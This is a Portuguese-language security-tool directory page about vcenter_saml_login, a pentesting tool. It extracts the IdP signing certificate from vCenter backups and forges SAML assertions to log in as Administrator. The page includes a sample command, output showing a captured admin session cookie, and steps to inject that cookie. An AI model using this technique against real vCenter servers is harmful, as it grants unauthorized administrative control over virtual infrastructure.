Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vcenter_saml_login — Uma ferramenta para extrair o certificado IdP de backups do vCenter e fazer login como Administrador | Kitploit
Ferramentas/GitHubGitHub/horizon3ai/vcenter_saml_login
Autenticação e AutorizaçãoSegurança de Infraestrutura em NuvemEscalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubhorizon3ai/vcenter_saml_login

vcenter_saml_login

Uma ferramenta para extrair o certificado IdP de backups do vCenter e fazer login como Administrador

Ver Repositório
52995há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

vCenter SAML Login Tool

Uma ferramenta para extrair o certificado do Provedor de Identidade (IdP) de backups do vCenter e fazer login como Administrador

Contexto

Comumente, durante engajamentos, obtemos acesso aos backups do vCenter em um servidor de arquivos ou acesso root ao host VCSA por meio de CVEs recentes. Fazer login na interface vSphere do vCenter nos permite acessar facilmente mais sistemas e informações confidenciais, além de mostrar aos clientes o impacto dessas descobertas.

O arquivo data.mdb contém os certificados e pode ser encontrado tanto nos backups do vCenter quanto no host VCSA com permissões de root. Esses certificados são armazenados em texto claro e podem ser usados para assinar qualquer solicitação de autenticação SAML para qualquer usuário — incluindo o Administrador integrado.

Se você quiser saber mais sobre vários casos de uso desta ferramenta e como a usamos para obter acesso administrativo a hosts vCenter, confira nosso post no blog: https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/

Uso

root@kitploit:~
root@kali:~/vcenter# python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200
[*] Successfully extracted the IdP certificate
[*] Successfully extracted trusted certificate 1
[*] Successfully extracted trusted certificate 2
[*] Obtaining hostname from vCenter SSL certificate
[*] Found hostname vcsa.olympus for 10.0.100.200
[*] Initiating SAML request with 10.0.100.200
[*] Generating SAML assertion
[*] Signing the SAML assertion
[*] Attempting to log into vCenter with the signed SAML request
[+] Successfuly obtained Administrator cookie for 10.0.100.200!
[+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640

Com o cookie acima, visite a instância VCSA em https://<VCSA>/ui, adicione o cookie no caminho /ui e navegue novamente para https://<VCSA>/ui.

Demonstração

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis nem se responsabilizam pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta